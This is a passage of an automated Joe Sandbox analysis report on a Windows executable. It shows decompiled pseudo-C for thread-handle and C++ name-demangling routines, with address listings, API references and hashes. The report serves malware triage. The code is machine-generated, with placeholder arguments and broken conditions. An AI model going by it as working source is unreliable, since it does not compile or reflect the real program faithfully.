                                                                                                                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                                                                                                                        				char* _t89;
                                                                                                                                                                                                                                                                                                        				char** _t92;
                                                                                                                                                                                                                                                                                                        				char** _t93;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t88 = __edi;
                                                                                                                                                                                                                                                                                                        				_t86 = __edx;
                                                                                                                                                                                                                                                                                                        				_t85 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t46 =  *0x422414; // 0xa52558
                                                                                                                                                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                                                                                                                                                        				_t89 = _a4;
                                                                                                                                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                                                                                                                                        				_v20 = 0xfeedbab1;
                                                                                                                                                                                                                                                                                                        				_v16 = 1;
                                                                                                                                                                                                                                                                                                        				if(_t46 == 0) {
                                                                                                                                                                                                                                                                                                        					_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        					_v56 = 4;
                                                                                                                                                                                                                                                                                                        					 *_t92 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        					_t46 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        					 *0x422414 = _t46;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				 *_t92 = _t46;
                                                                                                                                                                                                                                                                                                        				E00413FD0();
                                                                                                                                                                                                                                                                                                        				 *_t92 = _t89;
                                                                                                                                                                                                                                                                                                        				_t48 = E004107C0(_t86);
                                                                                                                                                                                                                                                                                                        				_t84 = _t48;
                                                                                                                                                                                                                                                                                                        				if(_t48 == 0) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					_t49 =  *0x422414; // 0xa52558
                                                                                                                                                                                                                                                                                                        					if(_t49 == 0) {
                                                                                                                                                                                                                                                                                                        						_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        						_v56 = 4;
                                                                                                                                                                                                                                                                                                        						 *_t92 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        						_t49 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        						 *0x422414 = _t49;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					 *_t92 = _t49;
                                                                                                                                                                                                                                                                                                        					E00413A00(_t85);
                                                                                                                                                                                                                                                                                                        					_t51 = 3;
                                                                                                                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t52 =  *(_t48 + 0x14);
                                                                                                                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_v56 =  &_v32;
                                                                                                                                                                                                                                                                                                        						 *_t92 = _t52;
                                                                                                                                                                                                                                                                                                        						_t53 = GetHandleInformation(??, ??);
                                                                                                                                                                                                                                                                                                        						_t92 = _t92 - 8;
                                                                                                                                                                                                                                                                                                        						if(_t53 != 0) {
                                                                                                                                                                                                                                                                                                        							__eflags =  *(_t84 + 0x24) & 0x00000004;
                                                                                                                                                                                                                                                                                                        							if(( *(_t84 + 0x24) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                                        								_t54 = E004102F0(_t84, _t85,  &_v32, _t88, _t89);
                                                                                                                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                                                                                                                        								if(_t54 == 0) {
                                                                                                                                                                                                                                                                                                        									_t55 = 0;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_t55 =  *((intOrPtr*)(_t54 + 0xbc));
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags = _t89 - _t55;
                                                                                                                                                                                                                                                                                                        								if(_t89 == _t55) {
                                                                                                                                                                                                                                                                                                        									_t56 =  *0x422414; // 0xa52558
                                                                                                                                                                                                                                                                                                        									__eflags = _t56;
                                                                                                                                                                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        										_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        										_v56 = 4;
                                                                                                                                                                                                                                                                                                        										 *_t92 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        										_t56 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        										 *0x422414 = _t56;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									 *_t92 = _t56;
                                                                                                                                                                                                                                                                                                        									E00413A00(_t85);
                                                                                                                                                                                                                                                                                                        									_t51 = 0x24;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									__eflags =  *(_t84 + 0x70);
                                                                                                                                                                                                                                                                                                        									if( *(_t84 + 0x70) != 0) {
                                                                                                                                                                                                                                                                                                        										L22:
                                                                                                                                                                                                                                                                                                        										 *_t92 =  *(_t84 + 0x14);
                                                                                                                                                                                                                                                                                                        										CloseHandle(??);
                                                                                                                                                                                                                                                                                                        										_t61 =  *(_t84 + 0x18);
                                                                                                                                                                                                                                                                                                        										_t93 = _t92 - 4;
                                                                                                                                                                                                                                                                                                        										__eflags = _t61;
                                                                                                                                                                                                                                                                                                        										if(_t61 != 0) {
                                                                                                                                                                                                                                                                                                        											 *_t93 = _t61;
                                                                                                                                                                                                                                                                                                        											CloseHandle(??);
                                                                                                                                                                                                                                                                                                        											_t93 = _t93 - 4;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										 *(_t84 + 0x18) = 0;
                                                                                                                                                                                                                                                                                                        										__eflags = _a8;
                                                                                                                                                                                                                                                                                                        										if(_a8 != 0) {
                                                                                                                                                                                                                                                                                                        											_t85 = _a8;
                                                                                                                                                                                                                                                                                                        											 *_a8 =  *((intOrPtr*)(_t84 + 4));
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										_t30 = _t84 + 0x1c; // 0x1c
                                                                                                                                                                                                                                                                                                        										 *_t93 = _t30;
                                                                                                                                                                                                                                                                                                        										E004140E0();
                                                                                                                                                                                                                                                                                                        										 *(_t84 + 0x34) = _v28;
                                                                                                                                                                                                                                                                                                        										__eflags =  *(_t84 + 0xb8);
                                                                                                                                                                                                                                                                                                        										 *(_t84 + 0x38) = _v24;
                                                                                                                                                                                                                                                                                                        										 *((intOrPtr*)(_t84 + 0x3c)) = _v20;
                                                                                                                                                                                                                                                                                                        										 *((intOrPtr*)(_t84 + 0x40)) = _v16;
                                                                                                                                                                                                                                                                                                        										if( *(_t84 + 0xb8) == 0) {
                                                                                                                                                                                                                                                                                                        											E0040FD20(_t84);
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										_t71 =  *0x422414; // 0xa52558
                                                                                                                                                                                                                                                                                                        										__eflags = _t71;
                                                                                                                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        											_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        											_v56 = 4;
                                                                                                                                                                                                                                                                                                        											 *_t93 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        											_t71 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        											 *0x422414 = _t71;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										 *_t93 = _t71;
                                                                                                                                                                                                                                                                                                        										E00413A00(_t85);
                                                                                                                                                                                                                                                                                                        										E00412210();
                                                                                                                                                                                                                                                                                                        										_t51 = 0;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_v56 = 0;
                                                                                                                                                                                                                                                                                                        										 *_t92 =  *(_t84 + 0x14);
                                                                                                                                                                                                                                                                                                        										_t77 = WaitForSingleObject(??, ??);
                                                                                                                                                                                                                                                                                                        										_t92 = _t92 - 8;
                                                                                                                                                                                                                                                                                                        										__eflags = _t77;
                                                                                                                                                                                                                                                                                                        										if(_t77 == 0) {
                                                                                                                                                                                                                                                                                                        											goto L22;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_t78 =  *0x422414; // 0xa52558
                                                                                                                                                                                                                                                                                                        											__eflags = _t78;
                                                                                                                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        												_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        												_v56 = 4;
                                                                                                                                                                                                                                                                                                        												 *_t92 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        												_t78 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        												 *0x422414 = _t78;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											 *_t92 = _t78;
                                                                                                                                                                                                                                                                                                        											E00413A00(_t85);
                                                                                                                                                                                                                                                                                                        											E00412210();
                                                                                                                                                                                                                                                                                                        											_t51 = 0x10;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                                                                                                                        								return _t51;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t81 =  *0x422414; // 0xa52558
                                                                                                                                                                                                                                                                                                        								__eflags = _t81;
                                                                                                                                                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        									_v52 = 0x40ef40;
                                                                                                                                                                                                                                                                                                        									_v56 = 4;
                                                                                                                                                                                                                                                                                                        									 *_t92 = "mtx_pthr_locked_shmem";
                                                                                                                                                                                                                                                                                                        									_t81 = E00414330(__eflags);
                                                                                                                                                                                                                                                                                                        									 *0x422414 = _t81;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								 *_t92 = _t81;
                                                                                                                                                                                                                                                                                                        								E00413A00(_t85);
                                                                                                                                                                                                                                                                                                        								return 0x16;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}


































                                                                                                                                                                                                                                                                                                        0x00412ec0
                                                                                                                                                                                                                                                                                                        0x00412ec0
                                                                                                                                                                                                                                                                                                        0x00412ec0
                                                                                                                                                                                                                                                                                                        0x00412ec8
                                                                                                                                                                                                                                                                                                        0x00412ecd
                                                                                                                                                                                                                                                                                                        0x00412ed4
                                                                                                                                                                                                                                                                                                        0x00412ed7
                                                                                                                                                                                                                                                                                                        0x00412ede
                                                                                                                                                                                                                                                                                                        0x00412ee7
                                                                                                                                                                                                                                                                                                        0x00412eee
                                                                                                                                                                                                                                                                                                        0x00412f93
                                                                                                                                                                                                                                                                                                        0x00412f9b
                                                                                                                                                                                                                                                                                                        0x00412fa3
                                                                                                                                                                                                                                                                                                        0x00412faa
                                                                                                                                                                                                                                                                                                        0x00412faf
                                                                                                                                                                                                                                                                                                        0x00412faf
                                                                                                                                                                                                                                                                                                        0x00412ef4
                                                                                                                                                                                                                                                                                                        0x00412ef7
                                                                                                                                                                                                                                                                                                        0x00412efc
                                                                                                                                                                                                                                                                                                        0x00412eff
                                                                                                                                                                                                                                                                                                        0x00412f06
                                                                                                                                                                                                                                                                                                        0x00412f08
                                                                                                                                                                                                                                                                                                        0x00412f28
                                                                                                                                                                                                                                                                                                        0x00412f28
                                                                                                                                                                                                                                                                                                        0x00412f2f
                                                                                                                                                                                                                                                                                                        0x00412f70
                                                                                                                                                                                                                                                                                                        0x00412f78
                                                                                                                                                                                                                                                                                                        0x00412f80
                                                                                                                                                                                                                                                                                                        0x00412f87
                                                                                                                                                                                                                                                                                                        0x00412f8c
                                                                                                                                                                                                                                                                                                        0x00412f8c
                                                                                                                                                                                                                                                                                                        0x00412f31
                                                                                                                                                                                                                                                                                                        0x00412f34
                                                                                                                                                                                                                                                                                                        0x00412f39
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412f0a
                                                                                                                                                                                                                                                                                                        0x00412f0a
                                                                                                                                                                                                                                                                                                        0x00412f0f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412f11
                                                                                                                                                                                                                                                                                                        0x00412f14
                                                                                                                                                                                                                                                                                                        0x00412f18
                                                                                                                                                                                                                                                                                                        0x00412f1b
                                                                                                                                                                                                                                                                                                        0x00412f21
                                                                                                                                                                                                                                                                                                        0x00412f26
                                                                                                                                                                                                                                                                                                        0x00412f45
                                                                                                                                                                                                                                                                                                        0x00412f49
                                                                                                                                                                                                                                                                                                        0x00412fc0
                                                                                                                                                                                                                                                                                                        0x00412fc5
                                                                                                                                                                                                                                                                                                        0x00412fc7
                                                                                                                                                                                                                                                                                                        0x004130e6
                                                                                                                                                                                                                                                                                                        0x00412fcd
                                                                                                                                                                                                                                                                                                        0x00412fcd
                                                                                                                                                                                                                                                                                                        0x00412fcd
                                                                                                                                                                                                                                                                                                        0x00412fd3
                                                                                                                                                                                                                                                                                                        0x00412fd5
                                                                                                                                                                                                                                                                                                        0x00413047
                                                                                                                                                                                                                                                                                                        0x0041304c
                                                                                                                                                                                                                                                                                                        0x0041304e
                                                                                                                                                                                                                                                                                                        0x004130ed
                                                                                                                                                                                                                                                                                                        0x004130f5
                                                                                                                                                                                                                                                                                                        0x004130fd
                                                                                                                                                                                                                                                                                                        0x00413104
                                                                                                                                                                                                                                                                                                        0x00413109
                                                                                                                                                                                                                                                                                                        0x00413109
                                                                                                                                                                                                                                                                                                        0x00413054
                                                                                                                                                                                                                                                                                                        0x00413057
                                                                                                                                                                                                                                                                                                        0x0041305c
                                                                                                                                                                                                                                                                                                        0x00412fd7
                                                                                                                                                                                                                                                                                                        0x00412fda
                                                                                                                                                                                                                                                                                                        0x00412fdc
                                                                                                                                                                                                                                                                                                        0x00413066
                                                                                                                                                                                                                                                                                                        0x0041306f
                                                                                                                                                                                                                                                                                                        0x00413072
                                                                                                                                                                                                                                                                                                        0x00413074
                                                                                                                                                                                                                                                                                                        0x00413077
                                                                                                                                                                                                                                                                                                        0x0041307a
                                                                                                                                                                                                                                                                                                        0x0041307c
                                                                                                                                                                                                                                                                                                        0x0041307e
                                                                                                                                                                                                                                                                                                        0x00413081
                                                                                                                                                                                                                                                                                                        0x00413083
                                                                                                                                                                                                                                                                                                        0x00413083
                                                                                                                                                                                                                                                                                                        0x00413089
                                                                                                                                                                                                                                                                                                        0x00413090
                                                                                                                                                                                                                                                                                                        0x00413092
                                                                                                                                                                                                                                                                                                        0x00413097
                                                                                                                                                                                                                                                                                                        0x0041309a
                                                                                                                                                                                                                                                                                                        0x0041309a
                                                                                                                                                                                                                                                                                                        0x0041309c
                                                                                                                                                                                                                                                                                                        0x0041309f
                                                                                                                                                                                                                                                                                                        0x004130a2
                                                                                                                                                                                                                                                                                                        0x004130b0
                                                                                                                                                                                                                                                                                                        0x004130b6
                                                                                                                                                                                                                                                                                                        0x004130b8
                                                                                                                                                                                                                                                                                                        0x004130be
                                                                                                                                                                                                                                                                                                        0x004130c4
                                                                                                                                                                                                                                                                                                        0x004130c7
                                                                                                                                                                                                                                                                                                        0x00413138
                                                                                                                                                                                                                                                                                                        0x00413138
                                                                                                                                                                                                                                                                                                        0x004130c9
                                                                                                                                                                                                                                                                                                        0x004130ce
                                                                                                                                                                                                                                                                                                        0x004130d0
                                                                                                                                                                                                                                                                                                        0x00413113
                                                                                                                                                                                                                                                                                                        0x0041311b
                                                                                                                                                                                                                                                                                                        0x00413123
                                                                                                                                                                                                                                                                                                        0x0041312a
                                                                                                                                                                                                                                                                                                        0x0041312f
                                                                                                                                                                                                                                                                                                        0x0041312f
                                                                                                                                                                                                                                                                                                        0x004130d2
                                                                                                                                                                                                                                                                                                        0x004130d5
                                                                                                                                                                                                                                                                                                        0x004130da
                                                                                                                                                                                                                                                                                                        0x004130df
                                                                                                                                                                                                                                                                                                        0x00412fe2
                                                                                                                                                                                                                                                                                                        0x00412fe2
                                                                                                                                                                                                                                                                                                        0x00412fed
                                                                                                                                                                                                                                                                                                        0x00412ff0
                                                                                                                                                                                                                                                                                                        0x00412ff6
                                                                                                                                                                                                                                                                                                        0x00412ff9
                                                                                                                                                                                                                                                                                                        0x00412ffb
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412ffd
                                                                                                                                                                                                                                                                                                        0x00412ffd
                                                                                                                                                                                                                                                                                                        0x00413002
                                                                                                                                                                                                                                                                                                        0x00413004
                                                                                                                                                                                                                                                                                                        0x0041313f
                                                                                                                                                                                                                                                                                                        0x00413147
                                                                                                                                                                                                                                                                                                        0x0041314f
                                                                                                                                                                                                                                                                                                        0x00413156
                                                                                                                                                                                                                                                                                                        0x0041315b
                                                                                                                                                                                                                                                                                                        0x0041315b
                                                                                                                                                                                                                                                                                                        0x0041300a
                                                                                                                                                                                                                                                                                                        0x0041300d
                                                                                                                                                                                                                                                                                                        0x00413012
                                                                                                                                                                                                                                                                                                        0x00413017
                                                                                                                                                                                                                                                                                                        0x00413017
                                                                                                                                                                                                                                                                                                        0x00412ffb
                                                                                                                                                                                                                                                                                                        0x00412fdc
                                                                                                                                                                                                                                                                                                        0x00412f3e
                                                                                                                                                                                                                                                                                                        0x00412f44
                                                                                                                                                                                                                                                                                                        0x00412f4b
                                                                                                                                                                                                                                                                                                        0x00412f4b
                                                                                                                                                                                                                                                                                                        0x00412f50
                                                                                                                                                                                                                                                                                                        0x00412f52
                                                                                                                                                                                                                                                                                                        0x00413021
                                                                                                                                                                                                                                                                                                        0x00413029
                                                                                                                                                                                                                                                                                                        0x00413031
                                                                                                                                                                                                                                                                                                        0x00413038
                                                                                                                                                                                                                                                                                                        0x0041303d
                                                                                                                                                                                                                                                                                                        0x0041303d
                                                                                                                                                                                                                                                                                                        0x00412f58
                                                                                                                                                                                                                                                                                                        0x00412f5b
                                                                                                                                                                                                                                                                                                        0x00412f6b
                                                                                                                                                                                                                                                                                                        0x00412f6b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412f26
                                                                                                                                                                                                                                                                                                        0x00412f0f

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetHandleInformation.KERNEL32 ref: 00412F1B
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32 ref: 00412FF0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HandleInformationObjectSingleWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 77340887-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d317a26b3cd460a8ecd9a6efaadd092c3b0c37b6c9f4cd4961985edcf548a9ad
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5295104ccd4e77eb4c30db888a1abb3289d5021b4c5d851bebd00781382d59b2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d317a26b3cd460a8ecd9a6efaadd092c3b0c37b6c9f4cd4961985edcf548a9ad
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F618EB06043059FDB10EF65D68439ABFF4AF04344F40882EE884DB345D7B8D982CBAA
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                                                                                                                                                                                        			E004083F4(signed int* __ebx, void* __ecx, void* __ebp, char* _a4, signed int _a8, signed int _a12, signed int _a16, char _a48) {
                                                                                                                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                                                                                                                                        				signed int* _t93;
                                                                                                                                                                                                                                                                                                        				unsigned int _t97;
                                                                                                                                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                                                                                                                                        				signed int _t103;
                                                                                                                                                                                                                                                                                                        				signed int* _t108;
                                                                                                                                                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                                                                                                                                                        				signed int _t113;
                                                                                                                                                                                                                                                                                                        				signed int _t118;
                                                                                                                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                                                                                                                        				signed int _t122;
                                                                                                                                                                                                                                                                                                        				signed int _t123;
                                                                                                                                                                                                                                                                                                        				signed int* _t124;
                                                                                                                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                                                                                                                                        				signed int _t130;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t132;
                                                                                                                                                                                                                                                                                                        				char* _t134;
                                                                                                                                                                                                                                                                                                        				char* _t136;
                                                                                                                                                                                                                                                                                                        				signed char* _t138;
                                                                                                                                                                                                                                                                                                        				void* _t141;
                                                                                                                                                                                                                                                                                                        				signed int** _t142;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t108 = __ebx;
                                                                                                                                                                                                                                                                                                        				_t130 = _a12;
                                                                                                                                                                                                                                                                                                        				E0040B090(__ebx,  *((intOrPtr*)(__ecx + 4)), _t130);
                                                                                                                                                                                                                                                                                                        				_t87 = __ebx[0x40];
                                                                                                                                                                                                                                                                                                        				if((_t130 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        					if(_t87 == 0xff) {
                                                                                                                                                                                                                                                                                                        						__ebx[0x3f] = 0;
                                                                                                                                                                                                                                                                                                        						_a4 = 0xff;
                                                                                                                                                                                                                                                                                                        						 *_t142 = __ebx;
                                                                                                                                                                                                                                                                                                        						_a8 = __ebx[0x43];
                                                                                                                                                                                                                                                                                                        						__ebx[0x42]();
                                                                                                                                                                                                                                                                                                        						_t122 = 1;
                                                                                                                                                                                                                                                                                                        						_t87 = 0;
                                                                                                                                                                                                                                                                                                        						__ebx[0x48] = __ebx[0x48] + 1;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t122 = _t87 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t108[0x40] = _t122;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_t108 + _t87)) = 0x2e;
                                                                                                                                                                                                                                                                                                        					_t108[0x41] = 0x2e;
                                                                                                                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					__esi = 0x41fa44;
                                                                                                                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                                                                                                                        						__edx =  *__esi & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						if(__eax != 0xff) {
                                                                                                                                                                                                                                                                                                        							__ecx = __eax + 1;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							__eax =  *(__ebx + 0x10c);
                                                                                                                                                                                                                                                                                                        							_a16 = __edx;
                                                                                                                                                                                                                                                                                                        							 *((char*)(__ebx + 0xff)) = 0;
                                                                                                                                                                                                                                                                                                        							_a4 = 0xff;
                                                                                                                                                                                                                                                                                                        							_a8 =  *(__ebx + 0x10c);
                                                                                                                                                                                                                                                                                                        							 *__esp = __ebx;
                                                                                                                                                                                                                                                                                                        							__eax =  *((intOrPtr*)(__ebx + 0x108))();
                                                                                                                                                                                                                                                                                                        							__ecx = 1;
                                                                                                                                                                                                                                                                                                        							__eax = 0;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(__ebx + 0x120)) =  *((intOrPtr*)(__ebx + 0x120)) + 1;
                                                                                                                                                                                                                                                                                                        							__edx = _a16;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						__esi =  &(__esi[1]);
                                                                                                                                                                                                                                                                                                        						 *(__ebx + 0x100) = __ecx;
                                                                                                                                                                                                                                                                                                        						 *((char*)(__ebx + __eax)) = __dl;
                                                                                                                                                                                                                                                                                                        						 *((char*)(__ebx + 0x104)) = __dl;
                                                                                                                                                                                                                                                                                                        						if(__esi == 0x41fa46) {
                                                                                                                                                                                                                                                                                                        							break;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						__eax = __ecx;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                                                                                                                        					_t132 = _a8;
                                                                                                                                                                                                                                                                                                        					if( *_t132 == 0x45) {
                                                                                                                                                                                                                                                                                                        						_t90 = _t108[0x40];
                                                                                                                                                                                                                                                                                                        						_t134 = "{default arg#";
                                                                                                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                                                                                                        							_t123 =  *_t134 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        							if(_t90 != 0xff) {
                                                                                                                                                                                                                                                                                                        								_t112 = _t90 + 1;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_a16 = _t123;
                                                                                                                                                                                                                                                                                                        								_t108[0x3f] = 0;
                                                                                                                                                                                                                                                                                                        								_a4 = 0xff;
                                                                                                                                                                                                                                                                                                        								_a8 = _t108[0x43];
                                                                                                                                                                                                                                                                                                        								 *_t142 = _t108;
                                                                                                                                                                                                                                                                                                        								_t108[0x42]();
                                                                                                                                                                                                                                                                                                        								_t112 = 1;
                                                                                                                                                                                                                                                                                                        								_t90 = 0;
                                                                                                                                                                                                                                                                                                        								_t108[0x48] = _t108[0x48] + 1;
                                                                                                                                                                                                                                                                                                        								_t123 = _a16;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t134 =  &(_t134[1]);
                                                                                                                                                                                                                                                                                                        							_t108[0x40] = _t112;
                                                                                                                                                                                                                                                                                                        							 *(_t108 + _t90) = _t123;
                                                                                                                                                                                                                                                                                                        							_t108[0x41] = _t123;
                                                                                                                                                                                                                                                                                                        							if(_t134 == 0x41fa54) {
                                                                                                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t90 = _t112;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_a4 = "%ld";
                                                                                                                                                                                                                                                                                                        						_a8 =  *((intOrPtr*)(_t132 + 8)) + 1;
                                                                                                                                                                                                                                                                                                        						_t93 =  &_a48;
                                                                                                                                                                                                                                                                                                        						 *_t142 = _t93;
                                                                                                                                                                                                                                                                                                        						_a16 = _t93;
                                                                                                                                                                                                                                                                                                        						sprintf(??, ??);
                                                                                                                                                                                                                                                                                                        						_t124 = _t93;
                                                                                                                                                                                                                                                                                                        						do {
                                                                                                                                                                                                                                                                                                        							_t113 =  *_t124;
                                                                                                                                                                                                                                                                                                        							_t124 =  &(_t124[1]);
                                                                                                                                                                                                                                                                                                        							_t97 = _t113 - 0x01010101 &  !_t113 & 0x80808080;
                                                                                                                                                                                                                                                                                                        						} while (_t97 == 0);
                                                                                                                                                                                                                                                                                                        						_t98 =  ==  ? _t97 >> 0x10 : _t97;
                                                                                                                                                                                                                                                                                                        						_t125 =  ==  ?  &(_t124[0]) : _t124;
                                                                                                                                                                                                                                                                                                        						_t99 = ( ==  ? _t97 >> 0x10 : _t97) + ( ==  ? _t97 >> 0x10 : _t97);
                                                                                                                                                                                                                                                                                                        						asm("sbb edx, 0x3");
                                                                                                                                                                                                                                                                                                        						_t126 = ( ==  ?  &(_t124[0]) : _t124) - _a16;
                                                                                                                                                                                                                                                                                                        						if(_t126 == 0) {
                                                                                                                                                                                                                                                                                                        							_t127 = _t108[0x40];
                                                                                                                                                                                                                                                                                                        							L29:
                                                                                                                                                                                                                                                                                                        							_t136 = "}::";
                                                                                                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                                                                                                        								_t100 =  *_t136 & 0x000000ff;
